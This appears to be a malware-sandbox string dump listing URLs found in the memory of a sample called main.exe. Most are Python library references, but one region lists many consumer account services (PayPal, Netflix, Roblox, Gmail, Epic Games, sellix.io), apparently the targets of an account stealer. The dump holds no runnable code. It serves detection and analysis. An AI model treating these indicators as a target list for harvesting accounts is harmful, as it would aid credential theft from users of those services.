Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: main.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: main.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: main.exe, 00000002.00000003.1975331009.000001E893501000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980293973.000001E893502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: main.exe, 00000002.00000003.1979666103.000001E8939E9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E8939F8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982059163.000001E8939EE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987528082.000001E8939F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984054418.000001E8939EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/pprint.html
Source: main.exe, 00000002.00000003.1980146595.000001E8939B3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979666103.000001E8939E9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E8939F8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982059163.000001E8939EE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987528082.000001E8939F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977996785.000001E8939B0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976495976.000001E89398C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978801071.000001E8939B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984054418.000001E8939EF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002704970.000001E8939B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/pprint.html#pprint.pprint
Source: main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A01000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A04000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020045883.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012429799.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996321903.000001E893968000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/re.html
Source: main.exe, 00000002.00000003.1793009900.000001E893AAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ebay.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://epicgames.com)
Source: main.exe, 00000002.00000003.1982648844.000001E894B39000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988603631.000001E894B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exiv2.orA
Source: main.exe, 00000002.00000003.1981902344.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1992755022.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exiv2.org/tags.html)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://expressvpn.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://expressvpn.com)P
Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com)
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E8947F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: main.exe, 00000000.00000003.1752729643.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mhammond/pywin32
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pallets/markupsafe/
Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/psf/requests/pull/6710
Source: main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packaging
Source: main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packaging02d2
Source: main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
Source: main.exe, 00000002.00000003.1976495976.000001E89398C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998205963.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyparsing/pyparsing/wiki
Source: main.exe, 00000002.00000002.2027115983.000001E895370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python-pillow/Pillow/
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777434520.000001E89154A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: main.exe, 00000002.00000003.1781941357.000001E8933CD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975282383.000001E893359000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977491655.000001E89338A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1781656560.000001E893672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: main.exe, 00000002.00000003.1972023696.000001E89477F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023880824.000001E894794000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985448658.000001E894790000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982748630.000001E89478F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001384242.000001E894790000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013797499.000001E894790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/32900
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gmail.com)
Source: main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976200965.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998719177.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001089205.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983459559.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024442172.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987244040.000001E893982000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hbo.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hotmail.com)
Source: main.exe, 00000002.00000003.1994855674.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003396948.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020672387.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980969299.000001E893C02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893BBE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020621648.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894850000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974563806.000001E893BAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985699146.000001E89484B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024088246.000001E8947D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://i.imgur.com/jJES3AX.png
Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://instagram.com)
Source: main.exe, 00000002.00000003.2003018568.000001E8945A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://markupsafe.palletsprojects.com/
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://markupsafe.palletsprojects.com/changes/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://minecraft.net)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://netflix.com)
Source: main.exe, 00000002.00000003.1998028650.000001E894BC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://origin.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com)
Source: main.exe, 00000002.00000003.2001762476.000001E8945A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003018568.000001E8945A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palletsprojects.com/donate
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://paypal.com)
Source: main.exe, 00000002.00000002.2017333313.000001E8933F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780566116.000001E89356F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779749185.000001E89356F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://playstation.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pornhub.com)
Source: main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://riotgames.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://riotgames.com)i75802
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://roblox.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sellix.io)
Source: main.exe, 00000002.00000003.1785741511.000001E8939DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978563125.000001E893A0C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012124595.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998205963.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
